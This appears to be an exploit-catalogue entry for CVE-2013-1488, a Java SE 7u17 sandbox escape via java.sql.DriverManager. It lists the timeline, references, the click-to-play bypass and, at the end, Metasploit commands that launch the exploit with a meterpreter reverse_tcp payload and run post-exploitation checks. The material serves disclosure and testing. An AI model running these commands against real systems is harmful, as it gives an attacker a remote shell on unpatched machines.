Timeline :

Vulnerability discovered, exploited by James Forshaw during Pwn2Own 2013
Vulnerability fixed by Oracle the 2013-04-16
Details on the vulnerability provided by James Forshaw the 2013-04-19
Metasploit PoC provided the 2013-06-07

PoC provided by :

James Forshaw
juan vazquez

Reference(s) :

CVE-2013-1488
OSVDB-91472
BID-58504
ZDI-13-076
Oracle Java SE Critical Patch Update Advisory – April 2013
Context Information Security Pwn2Own blog post

Affected version(s) :

JSE 7 Update 17 and before

Tested on Windows XP Pro with :

JSE 7 Update 17

Description :

This module abuses the java.sql.DriverManager class where the toString() method is called over user supplied classes from a doPrivileged block. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java Web Start can be launched automatically through the ActiveX control. Otherwise, the applet is launched without click-to-play bypass.

Commands :

use exploit/multi/browser/java_jre17_driver_manager
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo